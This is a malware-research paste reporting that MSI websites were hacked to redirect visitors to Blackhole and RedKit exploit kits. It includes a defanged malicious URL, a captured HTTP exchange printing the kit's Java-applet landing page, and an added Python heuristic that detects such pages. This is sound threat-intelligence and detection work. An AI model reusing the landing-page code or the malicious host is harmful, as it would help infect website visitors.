MalwareMustDie

*.MSI.COM got hacked, redirected to TDS to EK

Jul 15th, 2013
// *MSI.COM site got redirected by TDS,
// On one occasion to Blackhole sites
// Just checked it changed to RedKit Sites,

// Note PoC of this case:
http://urlquery.net/report.php?id=3764213
http://urlquery.net/report.php?id=3763965
http://urlquery.net/report.php?id=3764205

// Below RedKit PoC of the redirected URL:
// h00p://kristians1.net/blog/?p=5613

GET /blog/?p=5613 HTTP/1.1
Host: kristians1.net
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://fr.msi.com/


HTTP/1.1 200 OK
Date: Mon, 15 Jul 2013 17:56:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fcgid/2.3.5
X-Curl-Errno: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 173
Connection: close
Content-Type: text/html

<html><body><table>LOLOLO<applet><param name="jnlp_href" value="yde.xmp" /><param name="size" value="ur=ax=hmayzmjxkce0mdehczha&7&.y"></param></applet></table></body></html>

---
#MalwareMustDie!
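
An added detection sketch, not part of the original paste: it checks one HTTP exchange for the two traits visible in the capture above, a Referer from a different host and an `<applet>` carrying a `jnlp_href` param. The function names and the benign sample are constructed here, and both traits are heuristic assumptions for triage, not confirmed RedKit signatures.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class AppletParams(HTMLParser):
    """Collect the names of <param> tags nested inside an <applet>."""
    def __init__(self):
        super().__init__()
        self.depth, self.names = 0, set()

    def handle_starttag(self, tag, attrs):
        if tag == "applet":
            self.depth += 1
        elif tag == "param" and self.depth:
            self.names.add((dict(attrs).get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "applet" and self.depth:
            self.depth -= 1

def parse_headers(block):
    """Lowercase-keyed dict of the 'Name: value' lines after the start line."""
    pairs = (line.partition(":") for line in block.strip().splitlines()[1:])
    return {n.strip().lower(): v.strip() for n, sep, v in pairs if sep}

def findings(request, response):
    """Heuristic traits (assumptions, not signatures) seen in one exchange."""
    req = parse_headers(request)
    body = response.strip().partition("\n\n")[2]  # text after the header block
    parser = AppletParams()
    parser.feed(body)
    ref_host = urlparse(req.get("referer", "")).hostname
    hits = set()
    if ref_host and ref_host != req.get("host", "").lower():
        hits.add("cross_site_referer")   # visitor arrived from another site
    if "jnlp_href" in parser.names:
        hits.add("applet_jnlp_href")     # applet launched through a JNLP file
    return hits

# Request and response lines taken from the capture above (headers trimmed).
PAGE_REQ = "GET /blog/?p=5613 HTTP/1.1\nHost: kristians1.net\nReferer: http://fr.msi.com/\n"
PAGE_RESP = ('HTTP/1.1 200 OK\nContent-Type: text/html\n\n<html><body><table>LOLOLO<applet>'
             '<param name="jnlp_href" value="yde.xmp" /><param name="size" '
             'value="ur=ax=hmayzmjxkce0mdehczha&7&.y"></param></applet></table></body></html>')
# Constructed benign exchange: same-site Referer, applet without jnlp_href.
OK_REQ = "GET /clock.html HTTP/1.1\nHost: www.example.org\nReferer: http://www.example.org/\n"
OK_RESP = ('HTTP/1.1 200 OK\nContent-Type: text/html\n\n<html><body>'
           '<applet code="Clock.class"><param name="size" value="10"></applet></body></html>')

if __name__ == "__main__":
    print(sorted(findings(PAGE_REQ, PAGE_RESP)), sorted(findings(OK_REQ, OK_RESP)))
```

Neither trait is conclusive alone; the exchange in this paste matches both, the constructed benign one matches neither.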